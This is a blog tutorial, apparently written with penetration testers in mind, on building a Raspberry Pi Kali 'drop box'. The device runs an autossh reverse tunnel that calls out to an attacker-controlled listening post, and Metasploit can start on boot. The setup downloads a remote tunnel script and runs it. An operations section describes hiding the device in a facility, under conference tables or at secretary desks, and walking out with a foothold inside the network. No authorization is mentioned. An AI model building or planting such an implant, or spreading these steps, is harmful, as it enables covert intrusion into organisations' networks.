I recently received my Raspberry Pi Model B from Element 14 and was trying to come up with a creative way to use it. I looked around the internet and found a bunch of people doing some really cool stuff like sending their RPis into space and building automated coffee machines, but nothing really sparked my interest. Pwnplugs are expensive. The Raspberry Pwn script is cool, but doesn’t fit all of my needs. I heard that Kali Linux is supported on the Raspberry Pi and it seemed like a match made in heaven so I figured why not turn it into a drop box and have it try to connect back out to me. Although it won’t have all the cool tunneling and filter evasion stuff that a Pwnplug or Powerpwn has, it should get the job done.

Shopping list

• Raspberry Pi Model B - $35 + S&H
• Case of your choosing (I like the Ninja Pibow though a plain black case with no components exposed would be more discreet) - $20 + S&H
• Micro USB charging cable (5.0v @ 700 mA) - $5
• HDMI cable - >$10
• RPi compatible SDHC card (Lexar Platinum II 8GB, Class 6) - $20 from Target   Note: NOT ALL SDHC ARE COMPATIBLE!
• USB Keyboard - $10
• Cat5e ethernet cable - I’m sure you have one around there somewhere…
• OPTIONAL:
• Micro-sized wireless dongle - $25
• USB Mouse - $15

Download and Install Kali

First, download the Kali image for Raspberry Pi from here.

Then unzip the image.

gunzip kali-linux-1.0-armel-raspberrypi.img.gz

Check the name of your SD card.

df -h

If using the SDHC card I posted above, it should be a 8.0GB filesystem at /dev/mmcblk0

Unmount the SD card so that data can be written to it

umount /dev/mmcblk0

Change /dev/mmcblk0 to reflect whatever your SD card’s name is

Then use dd to write the Raspbian .img to the SD card.

sudo dd bs=512k if=kali-linux-1.0-armel-raspberrypi.img of=/dev/mmcblk0

Change /dev/mmcblk0 to reflect the name of your SD card again. dd does not display its status, so if you are concerned that is has stopped working, start up top and see if it is running (or try ps xfaw | grep dd)

Once dd has completed, eject the SD card and plug it into the RPi’s SD card slot. Then attach the HDMI cable to your monitor of choice and the RPi’s port as well as the USB keyboard and ethernet cable. Then connect the power cable and watch the device boot up. When you reach a command prompt, you’re all set and have verified the OS is working. Default creds at root / toor.

Resizing the SDHC card

It has been reported that the image may not take up the full SDHC card and you’ll be left with a bunch of useless space. I haven’t experienced the issue except with the soft-float wheezy image, but if you do, here’s how to fix that.

This will install the raspi-config script the Raspbian ships with. This includes “expand_rootfs” which will tell the file system to use the full available space on the SD card.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20121028_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb
dpkg -i triggerhappy_0.3.4-2_armel.deb
dpkg -i lua5.1_5.1.5-4_armel.deb
dpkg -i raspi-config_20121028_all.deb

Finally, run the following command to get started.

raspi_config

Then just run the expand_rootfs script. This should take some time. Once it’s completed, just reboot and carry on.

Make some basic configuration changes

First, make sure you change the default root password to something difficult to guess.

passwd

Turn on SSH.

/etc/init.d/ssh start
update-rc.d ssh enable

Create yourself a non-root user.

adduser $WHATEVER
su $WHATEVER

If you want, you can have Metasploit start up on boot. (I would wait and do this manually as needed.)

service postgresql start
service metasploit start
update-rc.d postgresql enable
update-rc.d metasploit enable

Setup SSH

Install autossh

apt-get -y install autossh

Then use wget to pull down a script from Github that will setup the tunneling for us.

wget http://github.com/mikeymckay/reverse_ssh_tunnel/raw/master/setup_reverse_tunnel.sh
chmod +x ./setup_reverse_tunnel.sh
./setup_reverse_tunnel.sh

Before running the script, however, there are a few key piece of information that you should know before the script asks for them:

• Middle-man server: This is your listening post, the host that will sit out on the internet waiting for connections from your devices. This should just be a public IP address.
• Middle-man server user: This is the user you will use to login to the listening post. SHOULD NOT BE ROOT! Make sure to create a new SSH user in the sudoers/wheel group.

Finally, run the following commands from the middleman server as well as the Pi respectively:

ssh-copy-id root@middlemanserver
ssh-copy-id root@yourpi

Operations

Upon entering a facility, find a ethernet port with access out to the internet (more common than you’d think) as well as a standard wall outlet unless you have a battery pack. Plug both cables into their respective ports and walk out.

My favorite locations are under conference room tables, copy rooms, secretary desks, and common areas such as “touchdown spaces.”

Once the device is planted and assuming it has a connection out, it should automatically connect to your listening post and you now have a presence inside the network.

Conclusion

And just like that, you have a network implant that will beacon out to you over and SSH tunnel as soon as it gets and internet connection. It would be great if you could combine with with an EC2 micro instance so that you don’t have to sacrifice an laptop and could have an “always on” device.

I”m sure I’ve forgotten some things and some parts may need some more detail or not work altogether. I will update this page as I work out those bugs.

Credit to T. Bradley for the idea as well as Mikey McKay for the auto-tunnel script!

[caption id=”attachment_61” align=”alignnone” width=”300”] Raspberry Pi with the Ninja PiBow Case[/caption]